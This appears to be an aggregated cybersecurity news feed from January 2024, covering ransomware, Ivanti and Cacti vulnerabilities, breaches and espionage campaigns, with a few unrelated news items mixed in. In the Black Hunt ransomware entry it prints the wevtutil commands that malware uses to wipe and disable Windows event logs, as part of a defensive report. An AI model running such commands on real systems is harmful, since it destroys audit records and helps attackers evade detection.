            Autosummary: The CVEs mentioned in these reports are: CVE-2023-46805 (CVSS score 8.2 out of 10), an authentication bypass vulnerability in the web component of Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure, which allows a remote attacker to access restricted resources by bypassing control checks. CISA has added CVE-2023-46805 and CVE-2024-21887 to its Known Exploited Vulnerabilities Catalog, which requires Federal Civilian Executive Branch (FCEB) agencies to remediate identified vulnerabilities by January 21, 2024, to protect FCEB networks against active threats.


            Ecuador city tries to return to normal after gang horror

            government
            2024-01-11 https://www.bbc.co.uk/news/world-latin-america-67950833?at_medium=RSS&at_campaign=KARANGA
            Life is returning to the streets of Guayaquil but the spectre of drug-gang violence remains.



            All India Pregnant Job service: The Indian men who fell for the scam

            financial
            2024-01-10 https://www.bbc.co.uk/news/world-asia-india-67860456?at_medium=RSS&at_campaign=KARANGA
            The conmen in Bihar state promised to pay huge sums of money to men to get childless women pregnant.



            The power of basics in 2024’s cybersecurity strategies

            industry ciber
            2024-01-10 https://www.helpnetsecurity.com/2024/01/10/cyber-defense-basics-video/

            In this Help Net Security video, Nick Carroll, Cyber Incident Response Manager at Raytheon, discusses how organizations are challenged to strengthen their defenses faster than cyber threats evolve, and how this ‘come from behind’ rush to keep pace with attackers can lead to the harmful practice of skipping the foundational basics of cyber defense and failing to establish a general sense of cyber awareness within the business.




            Researchers develop technique to prevent software bugs

            exploits
            2024-01-10 https://www.helpnetsecurity.com/2024/01/10/baldur-prevent-software-bugs/

            A team of computer scientists led by the University of Massachusetts Amherst recently announced a new method for automatically generating whole proofs that can be used to prevent software bugs and verify that the underlying code is correct. This new method, called Baldur, leverages the artificial intelligence power of LLMs, and, when combined with the tool Thor, yields efficacy of nearly 66%. “Software bugs have a profound impact on society today. They range from annoying …


            Autosummary: “Reducing bugs in software, or even producing bug-free software, has been a holy grail of systems building for decades, but, unfortunately, the state-of-the-practice in our society is that we expect all software to have bugs. On one benchmark, our method, combined with prior methods, generates proofs fully automatically 65.7% of the time, which is quite promising and would save engineers significant manual effort in writing these proofs,” Brun concluded.


            Free Decryptor Released for Black Basta and Babuk's Tortilla Ransomware Victims

            exploits ransomware
            2024-01-10 https://thehackernews.com/2024/01/free-decryptor-released-for-black-basta.html
            A decryptor for the Tortilla variant of the Babuk ransomware has been released by Cisco Talos, allowing victims targeted by the malware to regain access to their files. The cybersecurity firm said the threat intelligence it shared with Dutch law enforcement authorities made it possible to arrest the threat actor behind the operations. The encryption key has also been shared with Avast, …

            Autosummary: This includes Rook, Night Sky, Pandora, Nokoyawa, Cheerscrypt, AstraLocker 2.0, ESXiArgs, Rorschach, RTM Locker, and RA Group.


            Entire population of Brazil possibly exposed in massive data leak

            latam
            2024-01-10 https://securityaffairs.com/157203/security/entire-population-of-brazil-possibly-exposed-in-massive-data-leak.html
            The private data of hundreds of millions of Brazilian individuals was publicly accessible to threat actors, putting individuals at risk. Cybernews research revealed a publicly accessible Elasticsearch instance, which contained a staggering amount of private data belonging to Brazilian individuals. Elasticsearch is a commonly used tool for the search, analysis, and visualization of large volumes […]



            Decryptor for Tortilla variant of Babuk ransomware released

            exploits ransomware
            2024-01-10 https://securityaffairs.com/157214/cyber-crime/tortilla-variant-babuk-ransomware-decryptor.html
            Researchers and the Dutch Police released a decryptor for the Tortilla variant of the Babuk ransomware after the arrest of its operator. Cisco Talos researchers obtained a decryptor for the Babuk Tortilla ransomware variant. The experts were able to extract and share the private decryption key used by the ransomware operators. Talos experts shared the key […]

            Autosummary: Conti POC (.conti), REvil aka Revix (.rhkrc), Cylance ransomware (unrelated to the security company of the same name), Dataf Locker, Rorschach aka BabLock, Lock4, RTM Locker (per Uptycs). SentinelOne added that there are other unique ESXi ransomware families, such as ALPHV, BlackBasta, Hive, and Lockbit, that are not based on Babuk.


            Believing they would be paid a fortune for having sex with women, hundreds of Indian men scammed out of cash

            financial
            2024-01-10 https://grahamcluley.com/believing-they-would-be-paid-a-fortune-for-having-sex-with-women-hundreds-of-indian-men-scammed-out-of-cash/
            If you're desperate for money, you may make some foolhardy decisions about how to improve your finances.

            Autosummary: So far, the 33-year-old, who earns 15,000 rupees ($180; £142) per month working for a wedding party decoration company, has already lost 16,000 rupees to fraudsters – and they are asking for more.


            Hackers are targeting exposed MS SQL servers with Mimic ransomware

            exploits ransomware
            2024-01-10 https://www.helpnetsecurity.com/2024/01/10/ms-sql-mimic-ransomware/

            Hackers are brute-forcing exposed MS SQL database servers to deliver Mimic ransomware, Securonix researchers are warning. Mimic ransomware was first spotted in the wild in June 2022 and analyzed by Trend Micro researchers in January 2023. It abuses the APIs of a Windows filename search engine called Everything to search for files to be encrypted or avoided, and has the ability to delete shadow copies, kill processes and services (e.g., Windows Defender, …


            Autosummary: It abuses the APIs of a Windows filename search engine called Everything to search for files to be encrypted or avoided, and has the ability to delete shadow copies, kill processes and services (e.g., Windows Defender, Windows telemetry), unmount virtual drives, activate anti-shutdown and anti-kill measures, and more.


            Ivanti warns of Connect Secure zero-days exploited in attacks

            exploits
            2024-01-10 https://www.bleepingcomputer.com/news/security/ivanti-warns-of-connect-secure-zero-days-exploited-in-attacks/
            Ivanti has disclosed two Connect Secure (ICS) and Policy Secure zero-days exploited in the wild that can let remote attackers execute arbitrary commands on targeted gateways. [...]

            Autosummary: The first security flaw (CVE-2023-46805) is an authentication bypass in the gateways' web component, enabling attackers to access restricted resources by circumventing control checks, while the second (tracked as CVE-2024-21887) is a command injection vulnerability that lets authenticated admins execute arbitrary commands on vulnerable appliances by sending specially crafted requests.


            Fake 401K year-end statements used to steal corporate credentials

            government
            2024-01-10 https://www.bleepingcomputer.com/news/security/fake-401k-year-end-statements-used-to-steal-corporate-credentials/
            Threat actors are using communication about personal pension accounts (the 401(k) plans in the U.S.), salary adjustments, and performance reports to steal company employees' credentials. [...]

            Autosummary: (Figure: performance report lure, via Cofense.) Defense tips: Cofense says that all examples in its report are from employees of large enterprises that use effective email security solutions, yet many phishing messages still reach their employees' inboxes.


            SEC X account hacked to hawk crypto-scams

            financial
            2024-01-10 https://www.malwarebytes.com/blog/news/2024/01/sec-x-account-hacked-to-hawk-crypto-scams
            The US Securities and Exchange Commission's X account was compromised to take advantage of an expected Bitcoin ETFs announcement.

            Autosummary: The unauthorized post (which was removed within 30 minutes) said: “Today the SEC grants approval to Bitcoin ETFs for listing on registered national security exchanges.” To change your 2FA factor in X: click on More, select Settings and Support > Settings and Privacy > Security and Account access, click Security > Two-factor authentication, and put a checkmark in your preferred option.


            Jeffrey Epstein email scams rear their ugly head

            financial
            2024-01-10 https://grahamcluley.com/jeffrey-epstein-email-scams-rear-their-ugly-head/
            Security researchers say that there has been a "resurgence" in email scams related to notorious sex offender Jeffrey Epstein.

            Autosummary: Sometimes the scammer will ask you to send through sensitive personal information (such as identity documents) to assist with the “paperwork”, other times they might ask you to wire over money in advance to cut through the red tape of bureaucracy… the point is, that you’re going to end up losing out.


            Cisco says critical Unity Connection bug lets attackers get root

            exploits
            2024-01-10 https://www.bleepingcomputer.com/news/security/cisco-says-critical-unity-connection-bug-lets-attackers-get-root/
            Cisco has patched a critical Unity Connection security flaw that can let unauthenticated attackers remotely gain root privileges on unpatched devices. [...]



            Fidelity National Financial: Hackers stole data of 1.3 million people

            financial
            2024-01-10 https://www.bleepingcomputer.com/news/security/fidelity-national-financial-hackers-stole-data-of-13-million-people/
            Fidelity National Financial (FNF) has confirmed that a November cyberattack (claimed by the BlackCat ransomware gang) has exposed the data of 1.3 million customers. [...]

            Autosummary: "We determined that an unauthorized third-party accessed certain FNF systems, deployed a type of malware that is not self-propagating, and exfiltrated certain data," reads FNF's SEC filing.


            Pro-Ukraine hackers breach Russian ISP in revenge for KyivStar attack

            rusia-ucrania
            2024-01-10 https://www.bleepingcomputer.com/news/security/pro-ukraine-hackers-breach-russian-isp-in-revenge-for-kyivstar-attack/
            A pro-Ukraine hacktivist group named "Blackjack" has claimed a cyberattack against the Russian internet service provider M9com as a direct response to the attack against the Kyivstar mobile operator. [...]



            HMG Healthcare disclosed a data breach

            financial
            2024-01-10 https://securityaffairs.com/157244/data-breach/hmg-healthcare-data-breach.html
            The Healthcare services provider HMG Healthcare has disclosed a data breach that impacted 40 affiliated nursing facilities. In November 2023, the Healthcare services provider HMG Healthcare discovered a data breach that exposed personal health information related to residents and employees at HMG affiliated nursing facilities. The company immediately launched an investigation into the incident and […]



            The Cuban spying case that has shocked the US government

            government
            2024-01-09 https://www.bbc.co.uk/news/world-latin-america-67913465?at_medium=RSS&at_campaign=KARANGA
            Ex-CIA agent says Cuba has "surpassed the KGB" as a former top US diplomat is charged with spying.



            “Security researcher” offers to delete data stolen by ransomware attackers

            exploits ransomware
            2024-01-09 https://www.helpnetsecurity.com/2024/01/09/delete-stolen-data-ransomware/

            When organizations get hit by ransomware and pay the crooks to decrypt the encrypted data and delete the stolen data, they can never be entirely sure the criminals will do as they promised. And even if an organization gets its data decrypted, they cannot be sure the stolen data has indeed been wiped and won’t subsequently be used or sold. Someone is trying to take advantage of that fact, by posing as a security researcher …




            Syrian group Anonymous Arabic distributes stealthy malware Silver RAT

            exploits
            2024-01-09 https://securityaffairs.com/157153/cyber-crime/syrian-group-anonymous-arabic-silver-rat.html
            A hacker group that calls itself Anonymous Arabic is distributing a stealthy remote access trojan called Silver RAT. Cyfirma researchers observed threat actors called ‘Anonymous Arabic’ distributing a C# remote access trojan called Silver RAT. The malware supports multiple capabilities, including bypassing antivirus software and covertly launching hidden applications, browsers, and keyloggers. The hacker group is active on […]

            Autosummary: “The developer, operating under the name ‘Anonymous Arabic,’ appears to be supportive of Palestine based on their Telegram posts, and members associated with this group are active across various arenas, including social media, development platforms, underground forums, and Clearnet websites, suggesting their involvement in distributing various malware,” Cyfirma concludes.


            Google Search bug shows blank page in Firefox for Android

            exploits
            2024-01-09 https://www.bleepingcomputer.com/news/security/google-search-bug-shows-blank-page-in-firefox-for-android/
            Users of the Firefox browser for Android have been reporting that they are seeing a blank page when trying to load the main Google Search site. [...]



            Midwives clinic takes nine months to deliver news of data breach

            financial
            2024-01-09 https://www.bitdefender.com/blog/hotforsecurity/midwives-clinic-takes-nine-months-to-deliver-news-of-data-breach/
            Clients of a pregnancy care clinic in Ontario have had their personal information exposed to hackers. I'm sure I don't need to tell anyone who has made use of the services of a midwife, that a lot can happen in nine months... Read more in my article on the Hot for Security blog.

            Autosummary: Midwives of Windsor has reportedly contacted clients, informing them that one of its email accounts was compromised in April 2023, allowing hackers to gain unauthorised access to the following information: client's name, date of birth, mailing address, email address, telephone number, information regarding pregnancy, treatment/diagnosis information, prescription information, patient ID, and health insurance information. Clearly there is a good amount of sensitive information there, which could be exploited by fraudsters.


            Silex Technology AMC Protect improves cybersecurity for critical devices

            ciber
            2024-01-09 https://www.helpnetsecurity.com/2024/01/09/silex-technology-amc-protect/

            Silex Technology announced their new protection service product offering called AMC Protect, a robust software management service designed to monitor and remedy vulnerabilities. AMC Protect targets customers utilizing Silex’s embedded wireless LAN modules or purchasing Silex’s OEM products. “We have developed a cybersecurity-focused service product for customers leveraging custom firmware and software,” said Clay Fazio, VP of Product Management at Silex Technology. “While many industries are being plagued by vulnerabilities and cybersecurity attacks, the AMC …




            SQLi vulnerability in Cacti could lead to RCE (CVE-2023-51448)

            exploits
            2024-01-09 https://www.helpnetsecurity.com/2024/01/09/cve-2023-51448/

            A blind SQL injection vulnerability (CVE-2023-51448) in Cacti, a widely used network monitoring, performance and fault management framework, could lead to information disclosure and potentially remote code execution. Cacti is often used in network operation centers of telecoms and web hosting providers to collect network performance data and store it in RRDtool, a logging and graphing database and system that, through a web interface, creates graphical representations of the collected data. About CVE-2023-51448: CVE-2023-51448 is a …




            Turkish Hackers Exploiting Poorly Secured MS SQL Servers Across the Globe

            exploits
            2024-01-09 https://thehackernews.com/2024/01/turkish-hackers-exploiting-poorly.html
            Poorly secured Microsoft SQL (MS SQL) servers are being targeted in the U.S., European Union, and Latin American (LATAM) regions as part of an ongoing financially motivated campaign to gain initial access. “The analyzed threat campaign appears to end in one of two ways, either the selling of ‘access’ to the compromised host, or the ultimate delivery of ransomware payloads,” Securonix researchers …

Autosummary: “The analyzed threat campaign appears to end in one of two ways, either the selling of ‘access’ to the compromised host, or the ultimate delivery of ransomware payloads,” Securonix researchers Den Iuzvyk, Tim Peck, and Oleg Kolesnikov said in a technical report shared with The Hacker News.


            Microsoft January 2024 Patch Tuesday fixes 49 flaws, 12 RCE bugs

            exploits
            2024-01-09 https://www.bleepingcomputer.com/news/microsoft/microsoft-january-2024-patch-tuesday-fixes-49-flaws-12-rce-bugs/
Today is Microsoft's January 2024 Patch Tuesday, which includes security updates for a total of 49 flaws and 12 remote code execution vulnerabilities. [...]

Autosummary: The number of bugs in each vulnerability category is listed below:
10 Elevation of Privilege Vulnerabilities
7 Security Feature Bypass Vulnerabilities
12 Remote Code Execution Vulnerabilities
11 Information Disclosure Vulnerabilities
6 Denial of Service Vulnerabilities
3 Spoofing Vulnerabilities
The total count of 49 flaws does not include 4 Microsoft Edge flaws fixed on January 5th.


            Hackers target Microsoft SQL servers in Mimic ransomware attacks

            exploits ransomware
            2024-01-09 https://www.bleepingcomputer.com/news/security/hackers-target-microsoft-sql-servers-in-mimic-ransomware-attacks/
A group of financially motivated Turkish hackers targets Microsoft SQL (MSSQL) servers worldwide to encrypt the victims' files with Mimic (N3ww4v3) ransomware. [...]

Autosummary: “The analyzed threat campaign appears to end in one of two ways, either the selling of ‘access’ to the compromised host, or the ultimate delivery of ransomware payloads,” the Securonix Threat Research team who spotted the campaign said.


            Decryptor for Babuk ransomware variant released after hacker arrested

            exploits ransomware
            2024-01-09 https://www.bleepingcomputer.com/news/security/decryptor-for-babuk-ransomware-variant-released-after-hacker-arrested/
Researchers from Cisco Talos working with the Dutch police obtained a decryption tool for the Tortilla variant of Babuk ransomware and shared intelligence that led to the arrest of the ransomware's operator. [...]



            Paraguay warns of Black Hunt ransomware attacks after Tigo Business breach

            exploits ransomware
            2024-01-09 https://www.bleepingcomputer.com/news/security/paraguay-warns-of-black-hunt-ransomware-attacks-after-tigo-business-breach/
The Paraguay military is warning of Black Hunt ransomware attacks after Tigo Business suffered a cyberattack last week impacting cloud and hosting services in the company's business division. [...]

Autosummary: Black Hunt clears the Windows event logs (wevtutil cl) and disables the Security log (/e:false) with the following commands:
wevtutil.exe cl Setup
cmd.exe /c wevtutil.exe cl System
cmd.exe /c wevtutil.exe cl Application
cmd.exe /c wevtutil.exe cl Security
cmd.exe /c wevtutil.exe cl Security /e:false
In addition to the above, Black Hunt will perform a large amount of changes to Windows, including disabling Microsoft Defender, adding new users, disabling System Restore, and disabling Task Manager and the Run command.


            Criminal IP and Tenable Partner for Swift Vulnerability Detection

            exploits
            2024-01-09 https://www.bleepingcomputer.com/news/security/criminal-ip-and-tenable-partner-for-swift-vulnerability-detection/
Cyber Threat Intelligence (CTI) search engine Criminal IP has established a technical partnership with Tenable. Learn more from Criminal IP about how this partnership can assist in real-time vulnerability and maliciousness scans. [...]

Autosummary: Since then, the company has established technical and business partnerships with acclaimed global security firms, including VirusTotal, Cisco, Anomali, LogRhythm, Datadog, and more.


            Attackers could use vulnerabilities in Bosch Rexroth nutrunners to disrupt automotive production

            industry
            2024-01-09 https://www.helpnetsecurity.com/2024/01/09/vulnerabilities-bosch-rexroth/

            Researchers have discovered over two dozen vulnerabilities in “smart” cordless nutrunners (i.e., pneumatic torque wrenches) manufactured by Bosch Rexroth that could be exploited to make the devices inoperable or their output unreliable. “Depending on a manufacturer’s use and business configuration, devices such as the nutrunner may form a critical part of the quality management and assurance program in an enterprise, possibly even the last line of quality assurance. Compromise of the integrity in this final … More


Autosummary: After probing the security posture of the Bosch Rexroth NXA015S-36V-B nutrunner and discovering 25 vulnerabilities affecting the device’s management web application and the services parsing communications protocols, the researchers successfully tested two attack scenarios in their lab: deployment of custom ransomware (specifically designed for the devices’ OS), and stealthy alteration of tightening programs (while manipulating the onboard display). “We were able to make the device completely inoperable by preventing a local operator from controlling the drill through the onboard display and disabling the trigger button.”


            Alert: Water Curupira Hackers Actively Distributing PikaBot Loader Malware

            exploits
            2024-01-09 https://thehackernews.com/2024/01/alert-water-curupira-hackers-actively.html
A threat actor called Water Curupira has been observed actively distributing the PikaBot loader malware as part of spam campaigns in 2023. “PikaBot’s operators ran phishing campaigns, targeting victims via its two components — a loader and a core module — which enabled unauthorized remote access and allowed the execution of arbitrary commands through an established connection with



            CISA adds Apache Superset bug to its Known Exploited Vulnerabilities catalog

            exploits
            2024-01-09 https://securityaffairs.com/157175/security/cisa-adds-apache-superset-bug-known-exploited-vulnerabilities-catalog.html
U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Apache Superset vulnerability to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added an Apache Superset flaw, tracked as CVE-2023-27524, to its Known Exploited Vulnerabilities (KEV) catalog. Apache Superset is an open-source data visualization and data exploration platform; it is written in Python and based on […]

Autosummary: By Pierluigi Paganini, January 09, 2024. U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Apache Superset vulnerability to its Known Exploited Vulnerabilities catalog.


            LockBit ransomware gang claims the attack on Capital Health

            exploits ransomware
            2024-01-09 https://securityaffairs.com/157170/cyber-crime/lockbit-ransomware-hit-capital-health.html
The LockBit ransomware gang claimed responsibility for the cyber attack on the Capital Health hospital network. The LockBit ransomware operation has claimed responsibility for the cyberattack that hit the Capital Health hospital network in November 2023. Capital Health Regional Medical Center is a member of Capital Health System. Located in Trenton, New Jersey, Capital Health […]

Autosummary: By Pierluigi Paganini, January 09, 2024. The LockBit ransomware gang claimed responsibility for the cyber attack on the Capital Health hospital network.


            Ransomware victims targeted by fake hack-back offers

            exploits
            2024-01-09 https://www.bleepingcomputer.com/news/security/ransomware-victims-targeted-by-fake-hack-back-offers/
Some organizations victimized by the Royal and Akira ransomware gangs have been targeted by a threat actor posing as a security researcher who promised to hack back the original attacker and delete stolen victim data. [...]



            Windows 10 KB5034122 update released with fix for shut down bug

            exploits
            2024-01-09 https://www.bleepingcomputer.com/news/microsoft/windows-10-kb5034122-update-released-with-fix-for-shut-down-bug/
Microsoft has released the KB5034122 cumulative update for Windows 10 21H2 and Windows 10 22H2, which includes only a small number of fixes due to the holiday season. [...]

Autosummary: Windows users can install this update by going into Settings, clicking on Windows Update, and manually performing a "Check for Updates." However, as this update is mandatory, it will automatically start installing in Windows once you check for updates.


            Exposing the ransomware lie to “leave hospitals alone”

            exploits ransomware
            2024-01-09 https://www.malwarebytes.com/blog/news/2024/01/exposing-the-ransomware-lie-to-leave-hospitals-alone
Ransomware gangs are getting more ruthless to increase the pressure on their victims. Now, even swatting cancer patients seems to be on the table.

Autosummary: Once you’ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again. Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts. Ransomware groups are liars, yes, but even when these dangerous cybercriminals would ransack organizations and destroy entire companies, a few select groups espoused a sort of “honor among thieves.” Data breach: There are some actions you can take if you are, or suspect you may have been, the victim of a data breach.


            AuthLogParser: Open-source tool for analyzing Linux authentication logs

            Linux
            2024-01-08 https://www.helpnetsecurity.com/2024/01/08/authlogparser-open-source-analyzing-linux-authentication-logs/

            AuthLogParser is an open-source tool tailored for digital forensics and incident response, specifically crafted to analyze Linux authentication logs (auth.log). The tool examines the auth.log file, extracting crucial details like SSH logins, user creations, event names, IP addresses, among others. It produces a concise summary that offers a clear overview of the activities documented in the authentication logs, presenting the information in a format that is easy to read. AuthLogParser features “AuthLogParser’s distinctiveness lies in … More


Autosummary: User and group activity events:
Successful SSH Password Authentication
Successful SSH Public Key Authentication
New User Creation Activity
User Deletion Activity
User Password Change Activity
New Group Creation Activity
Group Deletion Activity
User Added To A Group Activity
User Removed From A Group Activity
Session Opened For User root
General activity events:
Machine Shutdown By Power Button
Future plans: In forthcoming iterations, the creator wants to elevate AuthLogParser beyond its initial success as a proof of concept.


            Vim 9.1 released: New features and bug fixes

            exploits
            2024-01-08 https://www.helpnetsecurity.com/2024/01/08/vim-9-1-is-released/

            Vim, a highly adaptable text editor, is designed to efficiently create and modify all types of text. It comes included as vi in most UNIX systems and macOS. Renowned for its rock-solid stability, Vim is constantly evolving to improve further, and version 9.1 has recently been released. The latest version focuses on fixes for unsafe memory access, leaks, buffer overflows, and potential crashes. Alongside, it introduces a handful of new features and numerous minor enhancements. … More



            McAfee Project Mockingbird defends users against AI-generated scams and disinformation

            financial
            2024-01-08 https://www.helpnetsecurity.com/2024/01/08/mcafee-project-mockingbird/

            McAfee announced its AI-powered Deepfake Audio Detection technology, known as Project Mockingbird. This new, proprietary technology was developed to help defend consumers against the surging threat of cybercriminals utilizing fabricated, AI-generated audio to carry out scams that rob people of money and personal information, enable cyberbullying, and manipulate the public image of prominent figures. Increasingly sophisticated and accessible Generative AI tools have made it easier for cybercriminals to create highly convincing scams, such as using … More


Autosummary: This new, proprietary technology was developed to help defend consumers against the surging threat of cybercriminals utilizing fabricated, AI-generated audio to carry out scams that rob people of money and personal information, enable cyberbullying, and manipulate the public image of prominent figures. “With McAfee’s latest AI detection capabilities, we will provide customers a tool that operates at more than 90% accuracy to help people understand their digital world and assess the likelihood of content being different than it seems,” said Steve Grobman, CTO, McAfee.


            Stuxnet: The malware that cost a billion dollars to develop?

            exploits
            2024-01-08 https://grahamcluley.com/stuxnet-the-malware-that-cost-a-billion-dollars/
A report from the Netherlands claims that a Dutch man played a key role in the notorious Stuxnet worm attack against an Iranian nuclear facility, which then accidentally escaped into the wider world.

Autosummary: If the report from NL Times is taken at face value, what is news is that an agent of AIVD (the Dutch intelligence agency), named as Erik van Sabben, also assisted the attack.


            Syrian Hackers Distributing Stealthy C#-Based Silver RAT to Cybercriminals

            ciber
            2024-01-08 https://thehackernews.com/2024/01/syrian-hackers-distributing-stealthy-c.html
Threat actors operating under the name Anonymous Arabic have released a remote access trojan (RAT) called Silver RAT that’s equipped to bypass security software and stealthily launch hidden applications. “The developers operate on multiple hacker forums and social media platforms, showcasing an active and sophisticated presence,” cybersecurity firm Cyfirma said in a report



            US mortgage lender loanDepot confirms ransomware attack

            exploits ransomware
            2024-01-08 https://www.bleepingcomputer.com/news/security/us-mortgage-lender-loandepot-confirms-ransomware-attack/
Leading U.S. mortgage lender loanDepot confirmed today that a cyber incident disclosed over the weekend was a ransomware attack that led to data encryption. [...]

Autosummary: "Though our investigation is ongoing, at this time, the Company has determined that the unauthorized third party activity included access to certain Company systems and the encryption of data," it said.


            Capital Health attack claimed by LockBit ransomware, risk of data leak

            exploits ransomware
            2024-01-08 https://www.bleepingcomputer.com/news/security/capital-health-attack-claimed-by-lockbit-ransomware-risk-of-data-leak/
The LockBit ransomware operation has claimed responsibility for a November 2023 cyberattack on the Capital Health hospital network and threatens to leak stolen data and negotiation chats by tomorrow. [...]

Autosummary: Unfortunately, recent examples of high-impact ransomware attacks in the healthcare sector are abundant, including other victims, such as Ardent Health Services, Integris Health, ESO Solutions, and the Fred Hutchinson Cancer Center (Fred Hutch).


            Toronto Zoo: Ransomware attack had no impact on animal wellbeing

            exploits ransomware
            2024-01-08 https://www.bleepingcomputer.com/news/security/toronto-zoo-ransomware-attack-had-no-impact-on-animal-wellbeing/
Toronto Zoo, the largest zoo in Canada, says that a ransomware attack that hit its systems early on Friday had no impact on the animals, its website, or its day-to-day operations. [...]



            Turkish hackers Sea Turtle expand attacks to Dutch ISPs, telcos

            Telcos
            2024-01-08 https://www.bleepingcomputer.com/news/security/turkish-hackers-sea-turtle-expand-attacks-to-dutch-isps-telcos/
The Turkish state-backed cyber espionage group tracked as Sea Turtle has been carrying out multiple spying campaigns in the Netherlands, focusing on telcos, media, internet service providers (ISPs), and Kurdish websites. [...]

Autosummary: Previously, Sea Turtle, also known as Teal Kurma and Cosmic Wolf, focused on the Middle Eastern region, as well as Sweden and the United States, using techniques like DNS hijacking and traffic redirection to perform man-in-the-middle attacks against government and non-government organizations, media, ISPs, and IT service providers.


            Week in review: 15 open-source cybersecurity tools, Patch Tuesday forecast

            ciber
            2024-01-07 https://www.helpnetsecurity.com/2024/01/07/week-in-review-15-open-source-cybersecurity-tools-patch-tuesday-forecast/

            Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Wi-Fi 7’s mission-critical role in enterprise, industrial networking In this Help Net Security interview, Tiago Rodrigues, CEO at Wireless Broadband Alliance, discusses the transformative world of Wi-Fi 7, exploring its features and the impact it promises to have on our digital landscape. Cybersecurity challenges emerge in the wake of API expansion In this Help Net Security interview, Vedran Cindric, CEO … More



            Turkish Sea Turtle APT targets Dutch IT and Telecom firms

            Telcos
            2024-01-07 https://securityaffairs.com/157021/apt/sea-turtle-targets-dutch-entities.html
Sea Turtle cyber espionage group targeted telco, media, ISPs, IT service providers, and Kurdish websites in the Netherlands. Researchers from Dutch security firm Hunt & Hackett observed Sea Turtle cyber espionage group (aka Teal Kurma, Marbled Dust, SILICON and Cosmic Wolf) targeting telco, media, ISPs, IT service providers, and Kurdish websites in the Netherlands. The […]

Autosummary: The group targets government entities, Kurdish (political) groups like the PKK, telecommunication, ISPs, IT service providers (including security companies), NGOs, and the Media & Entertainment sector. Over the years, the group has enhanced its evasion capabilities.


            How AI hallucinations are making bug hunting harder

            exploits
            2024-01-07 https://www.malwarebytes.com/blog/news/2024/01/how-ai-hallucinations-are-making-bug-hunting-harder
People using LLMs for bug bounty hunts are wasting developers' time, argues the lead developer of cURL. And he's probably right.

Autosummary: In the future, AI will undoubtedly prove to be useful in finding software bugs, but we expect these tools will be deployed by the developers themselves before the software goes live. He argues that, for some reason, bug bounty programs also attract fortune seekers that are looking for a quick buck without putting in the necessary work.


            Mortgage firm loanDepot cyberattack impacts IT systems, payment portal

            ciber
            2024-01-07 https://www.bleepingcomputer.com/news/security/mortgage-firm-loandepot-cyberattack-impacts-it-systems-payment-portal/
U.S. mortgage lender loanDepot has suffered a cyberattack that caused the company to take IT systems offline, preventing online payments against loans. [...]

Autosummary: "If you are seeking to make a payment, you may do so through our contact center by speaking with an agent at 866-258-6572 from 7 am CT to 7 pm CT Monday through Friday, and 8 am CT to 5 pm CT on Saturday," advises loanDepot's servicing portal.


            Stealthy AsyncRAT malware attacks targets US infrastructure for 11 months

            exploits
            2024-01-07 https://www.bleepingcomputer.com/news/security/stealthy-asyncrat-malware-attacks-targets-us-infrastructure-for-11-months/
A campaign delivering the AsyncRAT malware to select targets has been active for at least the past 11 months, using hundreds of unique loader samples and more than 100 domains. [...]

Autosummary: AsyncRAT is an open-source remote access tool (RAT) for Windows, publicly available since 2019, with functions for remote command execution, keylogging, data exfiltration, and dropping additional payloads.


            New Brazil manager: Dorival Jr leaves Sao Paulo to take job

            latam
            2024-01-07 https://www.bbc.co.uk/sport/football/67908693?at_medium=RSS&at_campaign=KARANGA
Dorival Jr leaves his role as coach of Sao Paulo and is set to take charge of Brazil's national team.

Autosummary: The much-travelled coach has also taken charge of Atletico Mineiro, Athletico Paranaense, Internacional, Vasco da Gama, Fluminense and Palmeiras.


            Sea Turtle Cyber Espionage Campaign Targets Dutch IT and Telecom Companies

            Telcos
            2024-01-06 https://thehackernews.com/2024/01/sea-turtle-cyber-espionage-campaign.html
Telecommunication, media, internet service providers (ISPs), information technology (IT)-service providers, and Kurdish websites in the Netherlands have been targeted as part of a new cyber espionage campaign undertaken by a Türkiye-nexus threat actor known as Sea Turtle. "The infrastructure of the targets was susceptible to supply chain and island-hopping attacks, which the attack group

Autosummary: To mitigate the risks posed by such attacks, it's advised that organizations enforce strong password policies, implement two-factor authentication (2FA), rate limit login attempts to reduce the chances of brute-force attempts, monitor SSH traffic, and keep all systems and software up-to-date.


            Pro-Iranian Hacker Group Targeting Albania with No-Justice Wiper Malware

            exploits
            2024-01-06 https://thehackernews.com/2024/01/pro-iranian-hacker-group-targeting.html
The recent wave of cyber attacks targeting Albanian organizations involved the use of a wiper called No-Justice. The findings come from cybersecurity company ClearSky, which said the Windows-based malware "crashes the operating system in a way that it cannot be rebooted." The intrusions have been attributed to an Iranian “psychological operation group” known as Homeland

Autosummary: On December 24, 2023, the adversary resurfaced after a hiatus, stating it's "back to destroy supporters of terrorists," describing its latest campaign as #DestroyDurresMilitaryCamp.


Mario Zagallo: Brazil's four-time World Cup winner dies aged 92

            latam
            2024-01-06 https://www.bbc.co.uk/sport/football/67900776?at_medium=RSS&at_campaign=KARANGA
Brazilian football legend Mario Zagallo, who won four World Cups as either a player or coach, dies aged 92.

Autosummary: The tactically astute Zagallo, nicknamed "The Professor" and "Old Wolf", pulled together a side filled with the attacking talents of Pele, Jairzinho, Gerson, Tostao and Rivellino and made them irresistible. "A devoted father, loving grandfather, caring father-in-law, faithful friend, victorious professional and a great human being.


            Law firm Orrick data breach impacted 638,000 individuals

            financial
            2024-01-06 https://securityaffairs.com/156985/breaking-news/law-firm-orrick-data-breach.html
Law firm Orrick, Herrington & Sutcliffe disclosed a data breach that took place in early 2023, which impacted roughly 600,000 individuals. The law firm Orrick, Herrington & Sutcliffe disclosed a data breach that impacted 638,000 individuals. An unauthorized actor gained access to the company network between February 28 and March 13. The intruders gained access […]

Autosummary: The information affected may have included: name, address, email address, date of birth, Social Security number, driver’s license or other government-issued identification number, passport number, financial account information, tax identification number, medical treatment and/or diagnosis information, claims information (date, cost of services, and claims identifiers), health insurance.


            Google: Malware abusing API is standard token theft, not an API issue

            exploits
            2024-01-06 https://www.bleepingcomputer.com/news/security/google-malware-abusing-api-is-standard-token-theft-not-an-api-issue/
Google is downplaying reports of malware abusing an undocumented Google Chrome API to generate new authentication cookies when previously stolen ones have expired. [...]

